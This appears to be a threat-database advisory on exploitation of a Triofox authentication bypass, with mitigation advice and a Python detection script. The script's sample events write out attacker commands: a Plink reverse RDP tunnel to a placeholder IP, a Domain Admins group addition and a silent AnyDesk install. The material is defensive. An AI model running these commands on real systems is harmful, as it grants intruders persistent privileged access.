
Hackers Exploiting Triofox Flaw to Install Remote Access Tools via Antivirus Feature

Severity: Critical
Tags: Malware, remote
Published: Mon Nov 10 2025 (11/10/2025, 20:49:00 UTC)
Source: The Hacker News

Description

Google's Mandiant Threat Defense on Monday said it discovered n-day exploitation of a now-patched security flaw in Gladinet's Triofox file-sharing and remote access platform. The critical vulnerability, tracked as CVE-2025-12480 (CVSS score: 9.1), allows an attacker to bypass authentication and access the configuration pages, resulting in the upload and execution of arbitrary payloads. The

AI-Powered Analysis

Last updated: 11/11/2025, 02:10:15 UTC

Technical Analysis

CVE-2025-12480 (CVSS 9.1) is an authentication bypass in Gladinet's Triofox file-sharing and remote access platform. An unauthenticated attacker can reach the configuration pages, rerun the initial setup flow and create a new native administrator account. Mandiant observed this exploited in the wild from August 2025 onward, after the fix had shipped in Triofox 16.7.10368.56560, which is what makes it n-day rather than zero-day exploitation.

Code execution comes from a feature rather than from a second bug. Triofox's built-in antivirus integration lets an administrator set an arbitrary path for the scanner executable, and the scanner runs with the SYSTEM privileges of the Triofox process. With the rogue admin account, the attackers pointed that setting at a batch script they had uploaded, centre_report.bat, so that the "scan" executed their script as SYSTEM. The script downloaded and installed Zoho Unified Endpoint Management System (UEMS) components from a remote IP address, and UEMS was in turn used to deploy Zoho Assist and AnyDesk for interactive access.

From there the intrusion followed a conventional post-exploitation path: reconnaissance, adding accounts to the local Administrators and Domain Admins groups, and persistence through encrypted SSH tunnels built with Plink and PuTTY that carried inbound RDP connections over port 433 to evade detection. This is the third Triofox vulnerability exploited in 2025, so the product is clearly under sustained attacker attention. The actors' end goal was not determined, but the tooling points to long-term remote access and control of compromised networks. Mandiant's analysis highlights immediate patching, auditing administrator accounts, and verifying that the antivirus scanner path has not been changed to point at an attacker-controlled file.

Potential Impact

For European organizations, successful exploitation means an unauthenticated attacker gains SYSTEM on the Triofox server and, from there, a foothold in the network: sensitive shared files are exposed, remote access tools are installed for persistence, and group membership changes can escalate to full domain compromise. Code running as SYSTEM bypasses most host-level controls, so the realistic outcomes are data breaches, intellectual property theft and disruption of business operations. Because the attackers rely on legitimate remote management software and on encrypted SSH tunnels, known-bad signatures are of limited use and responders have to work from behaviour rather than from binaries. Organizations that expose Triofox for remote access or file sharing, particularly in finance, healthcare and critical infrastructure, also face regulatory exposure and reputational damage. The continued exploitation after a patch was available shows that unpatched or misconfigured instances remain in the field across Europe, and an account added to Domain Admins gives the attacker lateral movement and persistent control over the whole enterprise network.

Mitigation Recommendations

European organizations should update Triofox to 16.7.10368.56560 or later; this is the only fix for CVE-2025-12480 itself. Then assume the pre-patch window may already have been used: audit every Triofox administrator account and remove any that is unauthorized or unexplained, paying particular attention to accounts named or resembling 'Cluster Admin'. Check the antivirus feature's configured scanner path against the binary you actually intend to run and treat any value pointing at a script, an upload directory or an unexpected location as an indicator of compromise; if the feature is not needed, disable it, and in any case alert on changes to that setting. Restrict network access to the Triofox server to trusted IP ranges with segmentation and firewall rules. Monitor for the post-exploitation tooling described above: Plink or PuTTY establishing SSH tunnels, in the observed intrusion with inbound RDP carried over port 433, and installation or launch of Zoho UEMS, Zoho Assist or AnyDesk on a server that has no business running them. Use EDR to flag script execution spawned from the Triofox process as SYSTEM and additions to the local Administrators or Domain Admins groups. Review Triofox logs for configuration changes and new account creation, and forward them to a central SIEM so these checks run continuously rather than once. Brief IT and security teams on this specific chain, and, where Triofox supports it, enable multi-factor authentication on administrator accounts.
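The post-exploitation chain in the Technical Analysis and the monitoring points in the recommendations above can be turned into concrete detection logic. The following is an added example written for this page, not code from The Hacker News, Mandiant or Gladinet; it runs four rules over process-creation records in the Sysmon Event ID 1 / Windows 4688 shape. The field names, the sample events, the IP address and the parent-process path containing "Triofox" are constructed assumptions, since the article does not document Triofox's internal process names.

```python
"""Detection logic for the CVE-2025-12480 post-exploitation chain.

Added example for this page, not code from the article or from Gladinet.
Each rule corresponds to a step described in the analysis: the antivirus
scanner path abused to run a script as SYSTEM, Plink/PuTTY tunnels carrying
RDP, remote access tool installs, and Administrators / Domain Admins additions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # path of the created process
    command_line: str
    parent_image: str   # path of the creating process
    user: str           # account the new process runs as


# Remote access tooling named in the report (Zoho UEMS, Zoho Assist, AnyDesk).
RAT_MARKERS = ("anydesk", "zohoassist", "zoho assist", "uems")


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of the rules a single event matches (empty if benign)."""
    hits = []
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    cmd = ev.command_line

    # Rule 1: antivirus-scanner path abuse. Triofox runs the configured scanner
    # as SYSTEM, so a script interpreter spawned from the Triofox process tree
    # with a .bat/.cmd/.ps1 argument (centre_report.bat in the observed case)
    # is the execution step of the chain. "triofox" in the parent path is an
    # assumption about where the service binary lives, not a documented name.
    if ("triofox" in parent and ev.user.lower().endswith("system")
            and re.search(r"\.(bat|cmd|ps1|vbs)\b", cmd, re.I)):
        hits.append("triofox_av_path_script_exec")

    # Rule 2: Plink/PuTTY remote port forwarding (-R) that exposes RDP. The
    # report names port 433 for the inbound RDP path; 3389 covers the plain case.
    if (re.search(r"(plink|putty)(\.exe)?$", image)
            and re.search(r"\s-R\s+\S*\b(433|3389)\b", cmd)):
        hits.append("ssh_reverse_tunnel_rdp")

    # Rule 3: install or launch of the remote access tools used for hands-on access.
    if any(m in image or m in cmd.lower() for m in RAT_MARKERS):
        hits.append("remote_access_tool")

    # Rule 4: privilege escalation by adding an account to Administrators or Domain Admins.
    if re.search(r'\bnet1?\s+(group\s+"?domain admins"?|localgroup\s+"?administrators"?)\s+\S+.*/add',
                 cmd, re.I):
        hits.append("admin_group_add")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rules, for every event that matched at least one."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}


# Constructed sample telemetry (not real logs); paths, accounts and the
# TEST-NET IP address are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Program Files (x86)\Triofox\centre_report.bat"',
              r"C:\Program Files (x86)\Triofox\TriofoxServer.exe",  # hypothetical service binary
              r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Users\Public\plink.exe",
              r"plink.exe -ssh -N -R 433:127.0.0.1:3389 tunnel@203.0.113.10 -pw ****",
              r"C:\Windows\System32\cmd.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Users\Public\AnyDesk.exe",
              r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent",
              r"C:\Windows\System32\cmd.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\net.exe",
              r'net group "Domain Admins" svc_cluster /add /domain',
              r"C:\Windows\System32\cmd.exe", r"CORP\svc_cluster"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\temp\notes.txt",
              r"C:\Windows\explorer.exe", r"CORP\alice"),  # benign control
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, "->", ", ".join(rules))
```

Run directly, the script prints which sample events match which rule. In practice the same four conditions map onto EDR or SIEM queries; rule 1 is the one specific to this vulnerability, because a Triofox service process has no legitimate reason to spawn a script interpreter as SYSTEM, whereas rules 2 to 4 catch the generic tooling that follows.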


Technical Details

Article Source
URL: https://thehackernews.com/2025/11/hackers-exploiting-triofox-flaw-to.html (fetched 2025-11-11T02:09:55Z; word count 1069)

Threat ID: 69129af814bc3e00ba7407a2

Added to database: 11/11/2025, 2:10:00 AM

Last enriched: 11/11/2025, 2:10:15 AM

Last updated: 11/12/2025, 1:43:05 PM
